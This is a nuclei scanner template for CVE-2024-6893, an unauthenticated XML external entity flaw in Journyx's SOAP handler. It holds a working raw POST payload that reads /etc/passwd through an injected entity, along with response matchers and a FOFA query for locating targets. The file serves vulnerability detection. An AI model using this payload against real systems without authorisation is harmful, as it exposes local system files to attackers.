nuclei-templates/http/cves/2024/CVE-2024-6893.yaml

55 lines
2.0 KiB
YAML

id: CVE-2024-6893
info:
name: Journyx - XML External Entities Injection (XXE)
author: s4eio
severity: high
description: |
The "soap_cgi.pyc" API handler allows the XML body of SOAP requests to contain references to external entities. This allows an unauthenticated attacker to read local files, perform server-side request forgery, and overwhelm the web server resources.
reference:
- https://securityforeveryone.com/tools/journyx-xxe-cve-2024-6893
- https://korelogic.com/Resources/Advisories/KL-001-2024-010.txt
- https://packetstormsecurity.com/files/180005/Journyx-11.5.4-XML-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2024-6893
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-6893
cwe-id: CWE-611
metadata:
max-request: 1
vendor: journyx
product: journyx-jtime
fofa-query: icon_hash="-109972155"
tags: cve,cve2024,journyx,xxe
variables:
pass: "{{rand_text_alpha(5)}}"
http:
- raw:
- |
POST /jtcgi/soap_cgi.pyc HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM "file:///etc/passwd">]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><changeUserPassword><username>&test;</username><curpwd>{{pass}}</curpwd><newpwd>{{pass}}</newpwd></changeUserPassword></soapenv:Body></soapenv:Envelope>
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'
- 'invalid password for user'
condition: and
- type: word
part: header
words:
- 'text/xml'
- type: status
status:
- 200
# digest: 4a0a00473045022100ccfcc5493ee053e591017307e4fd5f8a6c02f7a2453eff36d699da148931a65702206bfcce7c41d4b2ce64ea1c795f61e368009d03fb9daf31dbe6a9fcbb8518444c:922c64590222798bb761d5b6d8e72950